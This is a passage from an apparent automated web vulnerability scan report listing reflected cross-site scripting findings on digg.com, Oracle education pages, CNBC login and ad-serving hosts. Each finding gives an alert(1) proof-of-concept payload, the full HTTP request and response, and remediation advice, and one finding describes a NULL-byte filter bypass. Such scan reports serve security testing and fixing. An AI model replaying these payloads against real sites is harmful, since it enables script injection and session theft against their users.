Date: Tue, 06 Sep 2011 15:16:00 GMT
Content-Length: 1895
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;


               
...[SNIP]...
%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=1aa06'-alert(1)-'af6ec576df9">
...[SNIP]...

3.30. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003355b"><script>alert(1)</script>0a3916a9e29 was submitted in the REST URL parameter 1. This input was echoed as 3355b"><script>alert(1)</script>0a3916a9e29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%003355b"><script>alert(1)</script>0a3916a9e29 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=19408553 10.2.130.24
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14406

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, break
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%003355b"><script>alert(1)</script>0a3916a9e29.rss">
...[SNIP]...

3.31. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc [dc parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/db_pages.getCourseDesc

Issue detail

The value of the dc request parameter is copied into an HTML comment. The payload 2e67c--><a%20b%3dc>c97d7ad58db was submitted in the dc parameter. This input was echoed as 2e67c--><a b=c>c97d7ad58db in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pls/web_prod-plq-dad/db_pages.getCourseDesc?dc=D70302_13531452e67c--><a%20b%3dc>c97d7ad58db HTTP/1.1
Host: education.oracle.com
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057819943764065,1)
Content-Length: 3769
Date: Tue, 06 Sep 2011 15:55:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<!-- No course found for id D70302_13531452e67c--><a b=c>c97d7ad58db -->
...[SNIP]...

3.32. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/demandcapture_customer.customer_display

Issue detail

The value of the p_lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56fe7"%3balert(1)//452b678fc04 was submitted in the p_lang parameter. This input was echoed as 56fe7";alert(1)//452b678fc04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pls/web_prod-plq-dad/demandcapture_customer.customer_display?p_wddi_id=&p_org_id=&p_lang=56fe7"%3balert(1)//452b678fc04 HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057828533965601,0)
Content-Length: 570
Date: Tue, 06 Sep 2011 15:59:32 GMT

<script language="Javascript"> window.location.replace("https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=&p_org_id=&p_lang=56fe7";alert(1)//452b678fc04&p_pvt_event_flag=N&arg_course=&arg_v_country=&arg_v_city=&possible_date=06-OCT-11&emailadd=&no_students=1&add_info=&cust_name=&cust_contact_name=&phone_no=&street_Address=&cityname=&cust_region=&cust_
...[SNIP]...

3.33. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_wddi_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/demandcapture_customer.customer_display

Issue detail

The value of the p_wddi_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4d8a"%3balert(1)//25f551d98f2 was submitted in the p_wddi_id parameter. This input was echoed as e4d8a";alert(1)//25f551d98f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pls/web_prod-plq-dad/demandcapture_customer.customer_display?p_wddi_id=e4d8a"%3balert(1)//25f551d98f2&p_org_id=&p_lang= HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057875778605369,1)
Content-Length: 570
Date: Tue, 06 Sep 2011 15:59:32 GMT

<script language="Javascript"> window.location.replace("https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=e4d8a";alert(1)//25f551d98f2&p_org_id=&p_lang=&p_pvt_event_flag=N&arg_course=&arg_v_country=&arg_v_city=&possible_date=06-OCT-11&emailadd=&no_students=1&add_info=&cust_name=&cust_contact_name=&phone_no=&street_Address=&cityname=&
...[SNIP]...

3.34. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/header

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d40ec"><script>alert(1)</script>4d22a5b224d was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pls/web_prod-plq-dad/header?p_org_id=1001&lang=USd40ec"><script>alert(1)</script>4d22a5b224d HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057776994499472,1)
Content-Length: 950
Date: Tue, 06 Sep 2011 16:01:50 GMT

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<TITLE>Oracle University Courses & Registration </TITLE>
<LINK REL="stylesheet" href="/education/css/oracle.css">
<lin
...[SNIP]...
<SCRIPT language=JavaScript src="/admin/jscripts/rd_temp_config/
1001
USd40ec"><script>alert(1)</script>4d22a5b224d
_rd_temp_config.js">
...[SNIP]...

3.35. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/header

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4202e"%3balert(1)//231562bd186 was submitted in the lang parameter. This input was echoed as 4202e";alert(1)//231562bd186 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pls/web_prod-plq-dad/header?p_org_id=1001&lang=US4202e"%3balert(1)//231562bd186 HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057768404565213,0)
Content-Length: 920
Date: Tue, 06 Sep 2011 16:01:51 GMT

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<TITLE>Oracle University Courses & Registration </TITLE>
<LINK REL="stylesheet" href="/education/css/oracle.css">
<lin
...[SNIP]...
<SCRIPT language=JavaScript>var lang = "US4202e";alert(1)//231562bd186"</SCRIPT>
...[SNIP]...

3.36. http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect [p_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/show_desc.redirect

Issue detail

The value of the p_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd6e2"><script>alert(1)</script>818bc7ecf2f was submitted in the p_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2"><script>alert(1)</script>818bc7ecf2f HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: p_org_id=1001; domain=.oracle.com; path=/
Set-Cookie: p_lang=US; domain=.oracle.com; path=/
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057845713838882,1)
Content-Length: 1022
Date: Tue, 06 Sep 2011 15:59:36 GMT

<HTML>
<HEAD>
<TITLE>Catalog Search Results</TITLE>
<SCRIPT language=JavaScript>document.domain="oracle.com"</SCRIPT>
<SCRIPT language=JavaScript>var site_section = "Search"</SCRIPT>
<script language=
...[SNIP]...
<FRAME SRC="
/pls/web_prod-plq-dad
/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2"><script>alert(1)</script>818bc7ecf2f
" NAME="content" MARGINWIDTH=5 MARGINHEIGHT=0 SCROLLING=AUTO>
...[SNIP]...

3.37. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/webreg_course_index.main

Issue detail

The value of the p_lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62f6e"><script>alert(1)</script>33d02dcf400 was submitted in the p_lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e262f6e"><script>alert(1)</script>33d02dcf400 HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Length: 19101
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=200136460310,1)
Date: Tue, 06 Sep 2011 16:02:10 GMT

<!--*09:02:10*-->
<HTML><HEAD>
<TITLE>SSCD - Course Index</TITLE>
<LINK REL=stylesheet type="text/css" HREF="/admin/oracle.css">
<STYLE>
                   TD.selected    {BACKGROUND-COLOR: #CCCC99}
                   TD.nonSelec
...[SNIP]...
<SCRIPT language=JavaScript src="/admin/jscripts/rd_temp_config/
1001
UScd6e262f6e"><script>alert(1)</script>33d02dcf400
_rd_temp_config.js">
...[SNIP]...

3.38. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/webreg_course_index.main

Issue detail

The value of the p_lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76780"%3balert(1)//43d7466ae8e was submitted in the p_lang parameter. This input was echoed as 76780";alert(1)//43d7466ae8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780"%3balert(1)//43d7466ae8e HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Length: 18996
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=216172922120704642,1)
Date: Tue, 06 Sep 2011 16:02:12 GMT

<!--*09:02:12*-->
<HTML><HEAD>
<TITLE>SSCD - Course Index</TITLE>
<LINK REL=stylesheet type="text/css" HREF="/admin/oracle.css">
<STYLE>
                   TD.selected    {BACKGROUND-COLOR: #CCCC99}
                   TD.nonSelec
...[SNIP]...
<SCRIPT language=JavaScript>var lang = "UScd6e276780";alert(1)//43d7466ae8e"</SCRIPT>
...[SNIP]...

3.39. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b161b"-alert(1)-"550e756bc09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=11792&type=mrect&b161b"-alert(1)-"550e756bc09=1 HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:23 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315321223_1313187598706:39968351671824534083; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:23 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:23 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 235

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrect&b161b"-alert(1)-"550e756bc09=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.40. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3925"-alert(1)-"281d83ef8c3 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=11792&type=mrectb3925"-alert(1)-"281d83ef8c3 HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315321222_1313187598706:39968351671824534083; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:22 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:22 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 232

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrectb3925"-alert(1)-"281d83ef8c3' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.41. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload ae529<script>alert(1)</script>55e88475fb6 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=F09828ae529<script>alert(1)</script>55e88475fb6 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 06 Sep 2011 16:45:35 GMT
Cache-Control: max-age=86400, private
Expires: Wed, 07 Sep 2011 16:45:35 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:45:34 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "F09828AE529<SCRIPT>ALERT(1)</SCRIPT>55E88475FB6" was not recognized.
*/

3.42. https://login.cnbc.com/cas/login [apphome parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the apphome request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed5c0"><script>alert(1)</script>0f8cf36ce47 was submitted in the apphome parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asped5c0"><script>alert(1)</script>0f8cf36ce47&login_view=subscription HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:10 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 7137
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
rm" action="login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asped5c0"><script>alert(1)</script>0f8cf36ce47&login_view=subscription">
...[SNIP]...

3.43. https://login.cnbc.com/cas/login [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the jsessionid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b9cd"><script>alert(1)</script>792007f2f0 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login;jsessionid=91914748D5C5843DB9029C8B383DFD63?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check9b9cd"><script>alert(1)</script>792007f2f0&login_view=register HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88588


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
